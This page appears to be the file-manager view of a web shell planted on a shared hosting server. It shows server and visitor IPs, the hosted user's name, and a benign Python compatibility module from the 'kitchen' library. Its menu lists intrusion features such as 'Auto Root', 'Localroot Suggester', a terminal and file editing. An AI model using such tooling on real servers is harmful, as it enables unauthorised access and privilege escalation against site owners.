Linux yavrix.internet-webhosting.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 103.8.25.136 & Your IP : 216.73.216.204
Domains :
Cant Read [ /etc/named.conf ]
User : klinikpe
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
kitchen /
pycompat27 /
Delete
Unzip
Name
Size
Permission
Date
Action
subprocess
[ DIR ]
drwxr-xr-x
2020-06-12 08:00
__init__.py
419
B
-rw-r--r--
2012-02-14 18:52
__init__.pyc
667
B
-rw-r--r--
2014-06-10 05:56
__init__.pyo
667
B
-rw-r--r--
2014-06-10 05:56
Save
Rename
''' The :mod:`kitchen.pycompat27` module contains implementations of functionality introduced in python-2.7 for use on earlier versions of python. .. versionchanged:: 0.2.3 Made mswindows, MAXFD, and list2cmdline available from the module ''' from kitchen.versioning import version_tuple_to_string __version_info__ = ((1, 1, 0),) __version__ = version_tuple_to_string(__version_info__) __all__ = ('subprocess',)